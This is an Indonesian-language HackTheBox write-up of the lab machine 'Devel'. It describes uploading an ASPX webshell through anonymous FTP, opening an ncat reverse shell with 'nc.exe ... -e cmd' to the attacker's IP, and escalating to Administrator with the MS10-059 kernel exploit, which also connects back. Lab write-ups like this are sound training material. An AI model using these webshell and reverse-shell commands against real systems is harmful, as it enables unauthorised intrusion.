HACKTHEBOX WALKTROUGH

Devel Machine

CVE-CWE N/A (Without Metasploit)

Dimas Kusuma
4 min readDec 3, 2020

Trimakasih sudah meluangkan waktu untuk membaca artikel ini. Saat ini penulis menghadapi mesin retired HTB “Devel” yang dimana total ada 72 mesin retired setelah penulis memperbarui list target penulis yang terdapat pada list netsecfocus, dan penulis akan menempuh list target tersebut dan di dokumentasikan di akun medium ini.

Semoga pembaca semakin diberkahi dan ditingkatkan keilmuannya, serta selalu tercapai setiap tujuan dan cita-citanya atas Kehendak-Nya, juga yang sedang menempuh sertifikasi OSCP semoga tercapai dan sukses total, Aamiin. Full list mesin retired HTB oleh netsecfocus dapat di akses disini.

Reconnaissance

Result Nmap :

Git 1

Notes :

Pada Git 1 Line 1 diketahui bahwa pada service ftp terdapat missconfiguration, dimana siapapun dapat melakukan akses terhadap file dan folder di server tanpa otentikasi.

Enumeration

Penulis mengunjingi ip address 10.10.10.5 via browser.

Gambar 1

Berdasarkan informasi dari hasil scan nmap dan juga berdasarkan tampilan index dari ip address target yang penulis akses via browser, maka diketahui bahwa ftp anonymous di mesin target adalah webroot.

# ftp 10.10.10.5

Kemudian penulis melalukan upload webshell aspx ke dalam server target.

ftp> put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx
Gambar 2

Kemudian penulis akses webshell aspx yang telah penulis upload ke mesin target melalui browser.

http://10.10.10.5/cmdasp.aspx
Gambar 3

Initial Shell

Penulis melanjutkan tahap untuk melakukan akses shell mesin target melalui teknik reverse shell menggunakan ncat.

Gambar 4

Untuk melakukan copy file nc.exe dari localhost penulis menuju server target, penulis menggunakan python smb server.

# smbserverpython-kcrt
Gambar 5
copy \\10.10.14.28\kcrt\nc.exe c:\windows\temp\nc.exe
Gambar 6

Setelah itu, penulis hanya perlu menjalankan ncat dengan perintah berikut.

c:\windows\temp\nc.exe 10.10.14.28 888 -e cmd
Gambar 7

Privilege Escalation

Untuk mendapatkan akses shell sebagai Administrator, penulis melakukan privilege escalation menggunakan vulnerability yang beberapa bagian tersebut dapat penulis ketahui melalui systeminfo.

Gambar 8
Git 2

Kemudian penulis menggunakan output/result dari systeminfo untuk disesuaikan dengan beberapa list windows exploit suggester.

# python windows-exploit-suggester.py --database 2020-10-15-mssb.xls --systeminfo Devel.txt
Gambar 9

Setelah terdapat informasi beberapa saran vulnerability, penulis memutuskan untuk menggunakan exploit dari vulnerability MS10–059.

c:\Windows\Temp>copy \\10.10.14.28\kcrt\MS10-059.exe MS10-059.exe
# smbserverpython-kcrt
Gambar 10

Setelah penulis memindahkan file exploit MS10–059.exe kedalam mesin target. Penulis hanya perlu menjalankan exploit, seperti menjalankan ncat pada saat melakukan teknik reverse shell.

c:\Windows\Temp>MS10-059.exe 10.10.14.28 555

Dilanjuti dengan menjalankan listener menggunakan ncat melalui port 555 pada localhost penulis.

nc -lvvp 555
Gambar 11
Gambar 12

Penulis berhasil mendapatkan shell administrator.

Kesimpulan

Mesin ini masih tergolong kategori mudah. Untuk initial shell, penulis hanya perlu melakukan upload webshell aspx melalui missconfiguration ftp anonymous. Kemudian diteruskan menggunakan windows kernel exploit untuk mendapatkan session administrator.

Reference

  1. https://github.com/AonCyberLabs/Windows-Exploit-Suggester
  2. https://github.com/abatchy17/WindowsExploits/tree/master/MS10-059%20-%20Chimichurri

Target

51 mesin lagi !

--

--